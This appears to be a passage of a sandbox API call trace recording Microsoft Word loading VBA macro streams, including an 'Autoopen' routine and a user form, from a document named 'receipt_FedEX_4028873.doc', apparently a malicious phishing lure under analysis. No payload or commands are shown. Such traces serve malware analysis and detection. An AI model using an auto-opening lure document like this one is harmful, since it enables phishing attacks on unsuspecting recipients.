[0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb5", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb6", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb7", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb8", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xb9", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xba", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbb", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbc", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbd", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbe", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xbf", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc0", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc1", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc2", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc3", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc4", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc5", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc6", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc7", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc8", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xc9", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xca", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcb", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcc", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.152] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcd", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xce", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xcf", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd0", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd1", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd2", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd3", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd4", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd5", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd6", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd7", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd8", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xd9", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xda", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdb", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdc", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdd", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xde", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xdf", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe0", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe1", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe2", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe3", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe4", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe5", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe6", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe7", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe8", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xe9", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xea", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xeb", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xec", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xed", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xee", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xef", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf0", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf1", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf2", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf3", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf4", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf5", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf6", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf7", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf8", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xf9", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfa", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.153] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfb", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.154] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfc", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.154] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfd", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.154] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xfe", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.154] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\xff", cchSrc=1, lpCharType=0x186420 | out: lpCharType=0x186420) returned 1 [0041.154] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.154] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0041.154] IMalloc:Alloc (This=0x7feffc15380, cb=0xd) returned 0x6c31ff0 [0041.154] IMalloc:Alloc (This=0x7feffc15380, cb=0x1a) returned 0x68ea060 [0041.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c31ff0, cbMultiByte=13, lpWideCharStr=0x68ea060, cchWideChar=13 | out: lpWideCharStr="ThisDocument") returned 13 [0041.154] IMalloc:Free (This=0x7feffc15380, pv=0x6c31ff0) [0041.154] IMalloc:Free (This=0x7feffc15380, pv=0x68ea060) [0041.154] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.154] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0041.154] IMalloc:Alloc (This=0x7feffc15380, cb=0x15) returned 0x6c31ff0 [0041.154] IMalloc:Alloc (This=0x7feffc15380, cb=0x2a) returned 0x6889c70 [0041.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c31ff0, cbMultiByte=21, lpWideCharStr=0x6889c70, cchWideChar=21 | out: lpWideCharStr="1Normal.ThisDocument") returned 21 [0041.154] IMalloc:Alloc (This=0x7feffc15380, cb=0x2a) returned 0x6879030 [0041.155] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a2e0, cb=0x20) returned 0x68ea060 [0041.155] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a470, cb=0x28) returned 0x68ea030 [0041.155] IMalloc:Free (This=0x7feffc15380, pv=0x6c31ff0) [0041.155] IMalloc:Free (This=0x7feffc15380, pv=0x6889c70) [0041.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0041.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0041.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0041.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0041.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0041.155] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.156] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Autoopen") returned 0x102ad9 [0041.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2b62, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0041.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x38a2b62, cbMultiByte=8, lpWideCharStr=0x68f0a58, cchWideChar=8 | out: lpWideCharStr="Autoopen") returned 8 [0041.156] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x30) returned 0x6889c70 [0041.156] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x5030000 [0041.157] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidateOptionsForm") returned 0x10cbbe [0041.157] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x30) returned 0x6889bb0 [0041.157] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x5040000 [0041.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0041.159] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0041.159] CExposedStream::Read () returned 0x0 [0041.159] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ca4260, cb=0x288) returned 0x6ca4260 [0041.159] CExposedStream::Release () returned 0x1 [0041.159] CExposedStream::Release () returned 0x0 [0041.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm1", cchWideChar=10, lpMultiByteStr=0x186580, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm1", lpUsedDefaultChar=0x0) returned 10 [0041.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm1", cchWideChar=10, lpMultiByteStr=0x1866c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm1", lpUsedDefaultChar=0x0) returned 10 [0041.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.160] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c13f90, cb=0x10) returned 0x6c31ff0 [0041.160] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f1f0 [0041.160] IMalloc:GetSize (This=0x7feffc15380, pv=0x6b9f1f0) returned 0x80 [0041.160] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0d460 [0041.160] IMalloc:Alloc (This=0x7feffc15380, cb=0xb8) returned 0x6b0d5e0 [0041.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="UserForm1", cchWideChar=10, lpMultiByteStr=0x186580, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm1", lpUsedDefaultChar=0x0) returned 10 [0041.160] CoCreateGuid (in: pguid=0x1862b0 | out: pguid=0x1862b0*(Data1=0xe57a144e, Data2=0xccb8, Data3=0x4fa6, Data4=([0]=0xae, [1]=0xdd, [2]=0xf8, [3]=0x9c, [4]=0xaa, [5]=0xd5, [6]=0xaa, [7]=0x6f))) returned 0x0 [0041.160] CoCreateGuid (in: pguid=0x1862c0 | out: pguid=0x1862c0*(Data1=0x63007cd3, Data2=0xe508, Data3=0x4206, Data4=([0]=0xb9, [1]=0x8a, [2]=0x91, [3]=0x2b, [4]=0xf3, [5]=0x6f, [6]=0xe8, [7]=0xba))) returned 0x0 [0041.160] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="UserForm1", cchWideChar=10, lpMultiByteStr=0x1862d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserForm1", lpUsedDefaultChar=0x0) returned 10 [0041.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.160] GetLocalTime (in: lpSystemTime=0x1861a8 | out: lpSystemTime=0x1861a8*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x28b)) [0041.160] _ultow_s (in: _Value=0x5de83298, _Buffer=0x6c68fcc, _BufferCount=0x9, _Radix=16 | out: _Buffer="5de83298") returned 0x0 [0041.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="025de83298", cchWideChar=11, lpMultiByteStr=0x186140, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="025de83298", lpUsedDefaultChar=0x0) returned 11 [0041.160] strcpy_s (in: _Dst=0x6a7c200, _DstSize=0xa, _Src="UserForm1" | out: _Dst="UserForm1") returned 0x0 [0041.160] IMalloc:Realloc (This=0x7feffc15380, pv=0x6ad2340, cb=0xd0) returned 0x6c7b620 [0041.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.160] wcscpy_s (in: _Destination=0x6c690e0, _SizeInWords=0xa, _Source="UserForm1" | out: _Destination="UserForm1") returned 0x0 [0041.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.160] wcscpy_s (in: _Destination=0x6c690f8, _SizeInWords=0xa, _Source="UserForm1" | out: _Destination="UserForm1") returned 0x0 [0041.160] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b27dc0, cb=0x24) returned 0x68e9fd0 [0041.160] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a3a0, cb=0xc) returned 0x6b27dc0 [0041.160] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.160] IMalloc:Alloc (This=0x7feffc15380, cb=0x60) returned 0x6ad2340 [0041.160] IMalloc:Free (This=0x7feffc15380, pv=0x6b9efb0) [0041.160] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9f40 [0041.160] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e9f40, cb=0x8c) returned 0x6bac630 [0041.160] IMalloc:Free (This=0x7feffc15380, pv=0x6ad2340) [0041.160] IMalloc:Alloc (This=0x7feffc15380, cb=0x3d0) returned 0x6c6fbe0 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9f40 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c322b0 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9efb0 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a3a0 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a470 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x688) returned 0x6c8a8c0 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f280 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x640) returned 0x69d6b00 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9f10 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6b0a2e0 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x0) returned 0x6c13f90 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9eb0 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9f310 [0041.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0041.161] wcsncpy_s (in: _Destination=0x186320, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0041.161] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0041.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x186250, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0041.161] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0041.161] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0041.161] CExposedDocFile::AddRef () returned 0x4 [0041.161] CExposedDocFile::AddRef () returned 0x5 [0041.161] CExposedDocFile::OpenStream () returned 0x0 [0041.161] CExposedDocFile::Release () returned 0x4 [0041.161] CExposedStream::Seek () returned 0x0 [0041.161] CExposedStream::AddRef () returned 0x2 [0041.161] CExposedStream::Read () returned 0x0 [0041.161] CExposedStream::AddRef () returned 0x3 [0041.161] CExposedStream::Release () returned 0x2 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x2ee0) returned 0x6ca4500 [0041.161] CExposedStream::Read () returned 0x0 [0041.161] CExposedStream::Read () returned 0x0 [0041.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.161] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0xa) returned 0x6c322d0 [0041.161] IMalloc:Alloc (This=0x7feffc15380, cb=0x14) returned 0x6c323b0 [0041.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6c322d0, cbMultiByte=10, lpWideCharStr=0x6c323b0, cchWideChar=10 | out: lpWideCharStr="UserForm1") returned 10 [0041.161] IMalloc:Free (This=0x7feffc15380, pv=0x6c322d0) [0041.161] IMalloc:Free (This=0x7feffc15380, pv=0x6c323b0) [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0041.162] IMalloc:Alloc (This=0x7feffc15380, cb=0x4e) returned 0x6a671a0 [0041.162] IMalloc:Alloc (This=0x7feffc15380, cb=0x9c) returned 0x6c29900 [0041.162] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a671a0, cbMultiByte=78, lpWideCharStr=0x6c29900, cchWideChar=78 | out: lpWideCharStr="0{3201CC22-4323-4EF3-8B9C-19E82082DC0D}{CD48F839-E45B-49E9-A956-2DBED7A8E4A1}") returned 78 [0041.162] IMalloc:Alloc (This=0x7feffc15380, cb=0x9c) returned 0x6c299b0 [0041.162] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a3a0, cb=0x20) returned 0x68e9e20 [0041.162] IMalloc:Realloc (This=0x7feffc15380, pv=0x6b0a2e0, cb=0x28) returned 0x68e9df0 [0041.162] IMalloc:Free (This=0x7feffc15380, pv=0x6a671a0) [0041.162] IMalloc:Free (This=0x7feffc15380, pv=0x6c29900) [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0041.162] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 